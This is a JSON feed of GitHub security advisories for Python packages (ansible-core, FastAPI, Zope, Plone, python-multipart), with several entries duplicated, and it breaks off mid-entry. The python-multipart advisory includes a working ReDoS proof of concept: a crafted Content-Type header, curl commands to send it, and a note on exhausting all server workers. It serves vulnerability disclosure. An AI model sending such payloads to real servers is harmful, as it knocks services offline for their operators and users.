{
    "version": "https://jsonfeed.org/version/1",
    "title": "Security Advisory for Python packages hosted at PyPI.org",
    "home_page_url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip",
    "feed_url": "https://azu.github.io/github-advisory-database-rss/pip.json",
    "description": "Security Advisory for Python packages hosted at PyPI.org on GitHub",
    "items": [
        {
            "content_html": "<p>An information disclosure flaw was found in ansible-core due to a failure to respect the <code>ANSIBLE_NO_LOG</code> configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-0690\">https://nvd.nist.gov/vuln/detail/CVE-2024-0690</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/82565\">https://github.com/ansible/ansible/pull/82565</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2024-0690\">https://access.redhat.com/security/cve/CVE-2024-0690</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=2259013\">https://bugzilla.redhat.com/show_bug.cgi?id=2259013</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/6935c8e303440addd3871ecf8e04bde61080b032\">https://github.com/ansible/ansible/commit/6935c8e303440addd3871ecf8e04bde61080b032</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/78db3a3de6b40fb52d216685ae7cb903c609c3e1\">https://github.com/ansible/ansible/commit/78db3a3de6b40fb52d216685ae7cb903c609c3e1</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/b9a03bbf5a63459468baf8895ff74a62e9be4532\">https://github.com/ansible/ansible/commit/b9a03bbf5a63459468baf8895ff74a62e9be4532</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/beb04bc2642c208447c5a936f94310528a1946b1\">https://github.com/ansible/ansible/commit/beb04bc2642c208447c5a936f94310528a1946b1</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2024:0733\">https://access.redhat.com/errata/RHSA-2024:0733</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible-core/PYSEC-2024-36.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible-core/PYSEC-2024-36.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-h24r-m9qc-pvpg\">https://github.com/advisories/GHSA-h24r-m9qc-pvpg</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-h24r-m9qc-pvpg",
            "title": "[ansible-core] Ansible-core information disclosure flaw",
            "date_modified": "2024-02-14T14:57:22.000Z",
            "date_published": "2024-02-06T12:30:31.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-h24r-m9qc-pvpg"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>An information disclosure flaw was found in ansible-core due to a failure to respect the <code>ANSIBLE_NO_LOG</code> configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-0690\">https://nvd.nist.gov/vuln/detail/CVE-2024-0690</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/82565\">https://github.com/ansible/ansible/pull/82565</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2024-0690\">https://access.redhat.com/security/cve/CVE-2024-0690</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=2259013\">https://bugzilla.redhat.com/show_bug.cgi?id=2259013</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/6935c8e303440addd3871ecf8e04bde61080b032\">https://github.com/ansible/ansible/commit/6935c8e303440addd3871ecf8e04bde61080b032</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/78db3a3de6b40fb52d216685ae7cb903c609c3e1\">https://github.com/ansible/ansible/commit/78db3a3de6b40fb52d216685ae7cb903c609c3e1</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/b9a03bbf5a63459468baf8895ff74a62e9be4532\">https://github.com/ansible/ansible/commit/b9a03bbf5a63459468baf8895ff74a62e9be4532</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/beb04bc2642c208447c5a936f94310528a1946b1\">https://github.com/ansible/ansible/commit/beb04bc2642c208447c5a936f94310528a1946b1</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2024:0733\">https://access.redhat.com/errata/RHSA-2024:0733</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible-core/PYSEC-2024-36.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible-core/PYSEC-2024-36.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-h24r-m9qc-pvpg\">https://github.com/advisories/GHSA-h24r-m9qc-pvpg</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-h24r-m9qc-pvpg",
            "title": "[ansible-core] Ansible-core information disclosure flaw",
            "date_modified": "2024-02-14T14:57:22.000Z",
            "date_published": "2024-02-06T12:30:31.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-h24r-m9qc-pvpg"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>FastAPI versions lower than <code>0.65.2</code> that used cookies for authentication in path operations that received JSON payloads sent by browsers were vulnerable to a Cross-Site Request Forgery (CSRF) attack.</p>\n<p>In versions lower than <code>0.65.2</code>, FastAPI would try to read the request payload as JSON even if the <code>content-type</code> header sent was not set to <code>application/json</code> or a compatible JSON media type (e.g. <code>application/geo+json</code>).</p>\n<p>So, a request with a content type of <code>text/plain</code> containing JSON data would be accepted and the JSON data would be extracted.</p>\n<p>But requests with content type <code>text/plain</code> are exempt from <a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS\">CORS</a> preflights, for being considered <a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests\">Simple requests</a>. So, the browser would execute them right away including cookies, and the text content could be a JSON string that would be parsed and accepted by the FastAPI application.</p>\n<h3 id=\"patches\">Patches</h3>\n<p>This is fixed in FastAPI <code>0.65.2</code>.</p>\n<p>The request data is now parsed as JSON only if the <code>content-type</code> header is <code>application/json</code> or another JSON compatible media type like <code>application/geo+json</code>.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>It's best to upgrade to the latest FastAPI.</p>\n<p>But still, it would be possible to add a middleware or a dependency that checks the <code>content-type</code> header and aborts the request if it is not <code>application/json</code> or another JSON compatible content type.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS\">CORS on Mozilla web docs</a></li>\n<li><a href=\"https://security.stackexchange.com/questions/157528/ways-to-bypass-browsers-cors-policy/157531#157531\">This answer on StackExchange</a></li>\n<li><a href=\"https://owasp.org/www-community/attacks/csrf\">OWASP CSRF</a></li>\n<li>Fixed in PR <a href=\"https://github.com/tiangolo/fastapi/pull/2118\">#2118</a></li>\n</ul>\n<h3 id=\"for-more-information\">For more information</h3>\n<p>If you have any questions or comments, write to <a href=\"mailto:security@tiangolo.com\">security@tiangolo.com</a></p>\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/tiangolo/fastapi/security/advisories/GHSA-8h2j-cgx8-6xv7\">https://github.com/tiangolo/fastapi/security/advisories/GHSA-8h2j-cgx8-6xv7</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2021-32677\">https://nvd.nist.gov/vuln/detail/CVE-2021-32677</a></li>\n<li><a href=\"https://github.com/tiangolo/fastapi/commit/fa7e3c996edf2d5482fff8f9d890ac2390dede4d\">https://github.com/tiangolo/fastapi/commit/fa7e3c996edf2d5482fff8f9d890ac2390dede4d</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MATAWX25TYKNEKLDMKWNLYDB34UWTROA\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MATAWX25TYKNEKLDMKWNLYDB34UWTROA</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-8h2j-cgx8-6xv7\">https://github.com/advisories/GHSA-8h2j-cgx8-6xv7</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-8h2j-cgx8-6xv7",
            "title": "[fastapi] Cross-Site Request Forgery (CSRF) in FastAPI",
            "date_modified": "2024-02-12T21:35:06.000Z",
            "date_published": "2021-06-10T15:43:54.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-8h2j-cgx8-6xv7"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>ZCatalog plug-in index support capability for Zope 2.4.0 through 2.5.1 allows anonymous users and untrusted code to bypass access restrictions and call arbitrary methods of catalog indexes.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2002-0688\">https://nvd.nist.gov/vuln/detail/CVE-2002-0688</a></li>\n<li><a href=\"https://web.archive.org/web/20020810160608/http://www.zope.org/Products/Zope/Hotfix_2002-06-14/security_alert\">https://web.archive.org/web/20020810160608/http://www.zope.org/Products/Zope/Hotfix_2002-06-14/security_alert</a></li>\n<li><a href=\"https://web.archive.org/web/20020822025750/http://www.iss.net/security_center/static/9610.php\">https://web.archive.org/web/20020822025750/http://www.iss.net/security_center/static/9610.php</a></li>\n<li><a href=\"https://web.archive.org/web/20021206023914/http://rhn.redhat.com/errata/RHSA-2002-060.html\">https://web.archive.org/web/20021206023914/http://rhn.redhat.com/errata/RHSA-2002-060.html</a></li>\n<li><a href=\"https://web.archive.org/web/20021223212650/http://online.securityfocus.com/bid/5812\">https://web.archive.org/web/20021223212650/http://online.securityfocus.com/bid/5812</a></li>\n<li><a href=\"https://web.archive.org/web/20070430090648/http://www.debian.org/security/2004/dsa-490\">https://web.archive.org/web/20070430090648/http://www.debian.org/security/2004/dsa-490</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-7944-h5rw-qmjx\">https://github.com/advisories/GHSA-7944-h5rw-qmjx</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-7944-h5rw-qmjx",
            "title": "[zope] ZCatalog plug-in for Zope allows anonymous users to bypass access restrictions",
            "date_modified": "2024-02-12T20:33:01.000Z",
            "date_published": "2022-04-30T18:19:43.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-7944-h5rw-qmjx"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Zope is a Web application server for Linux. Zope versions 2.0 through 2.5.1 b1 are vulnerable to a denial of service attack, caused by a vulnerability that occurs when using the \"through the Web code\" capability. A remote attacker could inject malicious headers into a response to cause the vulnerable system to crash.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2002-0687\">https://nvd.nist.gov/vuln/detail/CVE-2002-0687</a></li>\n<li><a href=\"http://www.redhat.com/support/errata/RHSA-2002-060.html\">http://www.redhat.com/support/errata/RHSA-2002-060.html</a></li>\n<li><a href=\"http://www.zope.org/Products/Zope/Hotfix_2002-04-15/security_alert\">http://www.zope.org/Products/Zope/Hotfix_2002-04-15/security_alert</a></li>\n<li><a href=\"https://marc.info/?l=zope-announce&amp;m=101890177815066&amp;w=2\">https://marc.info/?l=zope-announce&amp;m=101890177815066&amp;w=2</a></li>\n<li><a href=\"https://marc.info/?l=zope-announce&amp;m=101897461507941&amp;w=2\">https://marc.info/?l=zope-announce&amp;m=101897461507941&amp;w=2</a></li>\n<li><a href=\"https://marc.info/?l=zope-announce&amp;m=101897462107967&amp;w=2\">https://marc.info/?l=zope-announce&amp;m=101897462107967&amp;w=2</a></li>\n<li><a href=\"https://web.archive.org/web/20020822024423/http://www.iss.net/security_center/static/9621.php\">https://web.archive.org/web/20020822024423/http://www.iss.net/security_center/static/9621.php</a></li>\n<li><a href=\"https://web.archive.org/web/20021018100409/http://online.securityfocus.com/bid/5813\">https://web.archive.org/web/20021018100409/http://online.securityfocus.com/bid/5813</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-vwrc-g9q6-f675\">https://github.com/advisories/GHSA-vwrc-g9q6-f675</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-vwrc-g9q6-f675",
            "title": "[zope] Zope Server vulnerable to DoS via header injection",
            "date_modified": "2024-02-12T18:04:45.000Z",
            "date_published": "2022-04-30T18:19:43.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-vwrc-g9q6-f675"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Zope is a Web application server for Linux. Zope versions 2.0 through 2.5.1 b1 are vulnerable to a denial of service attack, caused by a vulnerability that occurs when using the \"through the Web code\" capability. A remote attacker could inject malicious headers into a response to cause the vulnerable system to crash.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2002-0687\">https://nvd.nist.gov/vuln/detail/CVE-2002-0687</a></li>\n<li><a href=\"http://www.redhat.com/support/errata/RHSA-2002-060.html\">http://www.redhat.com/support/errata/RHSA-2002-060.html</a></li>\n<li><a href=\"http://www.zope.org/Products/Zope/Hotfix_2002-04-15/security_alert\">http://www.zope.org/Products/Zope/Hotfix_2002-04-15/security_alert</a></li>\n<li><a href=\"https://marc.info/?l=zope-announce&amp;m=101890177815066&amp;w=2\">https://marc.info/?l=zope-announce&amp;m=101890177815066&amp;w=2</a></li>\n<li><a href=\"https://marc.info/?l=zope-announce&amp;m=101897461507941&amp;w=2\">https://marc.info/?l=zope-announce&amp;m=101897461507941&amp;w=2</a></li>\n<li><a href=\"https://marc.info/?l=zope-announce&amp;m=101897462107967&amp;w=2\">https://marc.info/?l=zope-announce&amp;m=101897462107967&amp;w=2</a></li>\n<li><a href=\"https://web.archive.org/web/20020822024423/http://www.iss.net/security_center/static/9621.php\">https://web.archive.org/web/20020822024423/http://www.iss.net/security_center/static/9621.php</a></li>\n<li><a href=\"https://web.archive.org/web/20021018100409/http://online.securityfocus.com/bid/5813\">https://web.archive.org/web/20021018100409/http://online.securityfocus.com/bid/5813</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-vwrc-g9q6-f675\">https://github.com/advisories/GHSA-vwrc-g9q6-f675</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-vwrc-g9q6-f675",
            "title": "[zope] Zope Server vulnerable to DoS via header injection",
            "date_modified": "2024-02-12T18:04:45.000Z",
            "date_published": "2022-04-30T18:19:43.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-vwrc-g9q6-f675"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Zope 2.2.0 through 2.5.1 does not properly verify the access for objects with proxy roles, which could allow some users to access documents in violation of the intended configuration.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2002-0170\">https://nvd.nist.gov/vuln/detail/CVE-2002-0170</a></li>\n<li><a href=\"http://marc.info/?l=bugtraq&amp;m=101503023511996&amp;w=2\">http://marc.info/?l=bugtraq&amp;m=101503023511996&amp;w=2</a></li>\n<li><a href=\"http://www.redhat.com/support/errata/RHSA-2002-060.html\">http://www.redhat.com/support/errata/RHSA-2002-060.html</a></li>\n<li><a href=\"https://launchpad.net/zope2/+milestone/2.4.4\">https://launchpad.net/zope2/+milestone/2.4.4</a></li>\n<li><a href=\"https://launchpad.net/zope2/+milestone/2.5.1\">https://launchpad.net/zope2/+milestone/2.5.1</a></li>\n<li><a href=\"https://web.archive.org/web/20021120034302/http://online.securityfocus.com/bid/4229\">https://web.archive.org/web/20021120034302/http://online.securityfocus.com/bid/4229</a></li>\n<li><a href=\"https://web.archive.org/web/20070914020022/http://xforce.iss.net/xforce/xfdb/8334\">https://web.archive.org/web/20070914020022/http://xforce.iss.net/xforce/xfdb/8334</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-c3rp-4cjh-cp38\">https://github.com/advisories/GHSA-c3rp-4cjh-cp38</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-c3rp-4cjh-cp38",
            "title": "[zope] Zope does not properly verify the access for objects with proxy roles",
            "date_modified": "2024-02-12T17:57:58.000Z",
            "date_published": "2022-04-30T18:18:41.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-c3rp-4cjh-cp38"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Zope 2.2.0 through 2.5.1 does not properly verify the access for objects with proxy roles, which could allow some users to access documents in violation of the intended configuration.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2002-0170\">https://nvd.nist.gov/vuln/detail/CVE-2002-0170</a></li>\n<li><a href=\"http://marc.info/?l=bugtraq&amp;m=101503023511996&amp;w=2\">http://marc.info/?l=bugtraq&amp;m=101503023511996&amp;w=2</a></li>\n<li><a href=\"http://www.redhat.com/support/errata/RHSA-2002-060.html\">http://www.redhat.com/support/errata/RHSA-2002-060.html</a></li>\n<li><a href=\"https://launchpad.net/zope2/+milestone/2.4.4\">https://launchpad.net/zope2/+milestone/2.4.4</a></li>\n<li><a href=\"https://launchpad.net/zope2/+milestone/2.5.1\">https://launchpad.net/zope2/+milestone/2.5.1</a></li>\n<li><a href=\"https://web.archive.org/web/20021120034302/http://online.securityfocus.com/bid/4229\">https://web.archive.org/web/20021120034302/http://online.securityfocus.com/bid/4229</a></li>\n<li><a href=\"https://web.archive.org/web/20070914020022/http://xforce.iss.net/xforce/xfdb/8334\">https://web.archive.org/web/20070914020022/http://xforce.iss.net/xforce/xfdb/8334</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-c3rp-4cjh-cp38\">https://github.com/advisories/GHSA-c3rp-4cjh-cp38</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-c3rp-4cjh-cp38",
            "title": "[zope] Zope does not properly verify the access for objects with proxy roles",
            "date_modified": "2024-02-12T17:57:58.000Z",
            "date_published": "2022-04-30T18:18:41.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-c3rp-4cjh-cp38"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"summary\">Summary</h3>\n<p>When using form data, <code>python-multipart</code> uses a Regular Expression to parse the HTTP <code>Content-Type</code> header, including options.</p>\n<p>An attacker could send a custom-made <code>Content-Type</code> option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.</p>\n<p>This can create a ReDoS (Regular expression Denial of Service): <a href=\"https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\">https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS</a></p>\n<p>This only applies when the app uses form data, parsed with <code>python-multipart</code>.</p>\n<h3 id=\"details\">Details</h3>\n<p>A regular HTTP <code>Content-Type</code> header could look like:</p>\n<pre><code>Content-Type: text/html; charset=utf-8\n</code></pre>\n<p><code>python-multipart</code> parses the option with this RegEx: <a href=\"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\">https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74</a></p>\n<p>A custom option could be made and sent to the server to break it with:</p>\n<pre><code>Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n</code></pre>\n<h3 id=\"poc\">PoC</h3>\n<p>Create a simple WSGI application, that just parses the <code>Content-Type</code>, and run it with <code>python main.py</code>:</p>\n<pre><code class=\"language-Python\"># main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n    _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n    start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n    return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n</code></pre>\n<p>Then send the attacking request with:</p>\n<pre><code class=\"language-console\">$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'\n</code></pre>\n<h3 id=\"impact\">Impact</h3>\n<p>It's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. This way it also affects other libraries using Starlette, like FastAPI.</p>\n<h3 id=\"original-report\">Original Report</h3>\n<p>This was originally reported to FastAPI as an email to <a href=\"mailto:security@tiangolo.com\">security@tiangolo.com</a>, sent via <a href=\"https://huntr.com/\">https://huntr.com/</a>, the original reporter is Marcello, <a href=\"https://github.com/byt3bl33d3r\">https://github.com/byt3bl33d3r</a></p>\n<details>\n<summary>Original report to FastAPI</summary>\n\n<p>Hey Tiangolo!</p>\n<p>My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).</p>\n<p>Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:</p>\n<pre><code class=\"language-Python\">from typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n    username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n    return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n    return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n    return {\"username\": item.username}\n</code></pre>\n<p>I'm running the above with uvicorn with the following command:</p>\n<pre><code class=\"language-console\">uvicorn server:app\n</code></pre>\n<p>Then run the following cUrl command:</p>\n<pre><code>curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n</code></pre>\n<p>You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%</p>\n<p>You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.</p>\n<p>If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.</p>\n<p>Cheers</p>\n<h4 id=\"impact-1\">Impact</h4>\n<p>An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.</p>\n<h4 id=\"occurrences\">Occurrences</h4>\n<p><a href=\"https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586\">params.py L586</a></p>\n</details>\n### References\n\n<ul>\n<li><a href=\"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\">https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p</a></li>\n<li><a href=\"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\">https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4</a></li>\n<li><a href=\"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\">https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-2jv5-9r88-3w3p\">https://github.com/advisories/GHSA-2jv5-9r88-3w3p</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-2jv5-9r88-3w3p",
            "title": "[python-multipart] python-multipart  vulnerable to Content-Type Header ReDoS",
            "date_modified": "2024-02-12T17:28:12.000Z",
            "date_published": "2024-02-12T17:28:12.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-2jv5-9r88-3w3p"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Plone 2.0.5, 2.1.2, and 2.5-beta1 does not restrict access to the (1) changeMemberPortrait, (2) deletePersonalPortrait, and (3) testCurrentPassword methods, which allows remote attackers to modify portraits.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2006-1711\">https://nvd.nist.gov/vuln/detail/CVE-2006-1711</a></li>\n<li><a href=\"https://exchange.xforce.ibmcloud.com/vulnerabilities/25781\">https://exchange.xforce.ibmcloud.com/vulnerabilities/25781</a></li>\n<li><a href=\"http://www.debian.org/security/2006/dsa-1032\">http://www.debian.org/security/2006/dsa-1032</a></li>\n<li><a href=\"https://web.archive.org/web/20060412111111/https://dev.plone.org/plone/ticket/5432\">https://web.archive.org/web/20060412111111/https://dev.plone.org/plone/ticket/5432</a></li>\n<li><a href=\"https://web.archive.org/web/20060422195724/http://www.securityfocus.com/bid/17484\">https://web.archive.org/web/20060422195724/http://www.securityfocus.com/bid/17484</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-jcwh-rj6j-vm75\">https://github.com/advisories/GHSA-jcwh-rj6j-vm75</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-jcwh-rj6j-vm75",
            "title": "[plone] Plone allows remote users to modify arbitrary portraits",
            "date_modified": "2024-02-12T16:10:44.000Z",
            "date_published": "2022-05-01T06:52:02.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-jcwh-rj6j-vm75"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Plone 2.0.5, 2.1.2, and 2.5-beta1 does not restrict access to the (1) changeMemberPortrait, (2) deletePersonalPortrait, and (3) testCurrentPassword methods, which allows remote attackers to modify portraits.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2006-1711\">https://nvd.nist.gov/vuln/detail/CVE-2006-1711</a></li>\n<li><a href=\"https://exchange.xforce.ibmcloud.com/vulnerabilities/25781\">https://exchange.xforce.ibmcloud.com/vulnerabilities/25781</a></li>\n<li><a href=\"http://www.debian.org/security/2006/dsa-1032\">http://www.debian.org/security/2006/dsa-1032</a></li>\n<li><a href=\"https://web.archive.org/web/20060412111111/https://dev.plone.org/plone/ticket/5432\">https://web.archive.org/web/20060412111111/https://dev.plone.org/plone/ticket/5432</a></li>\n<li><a 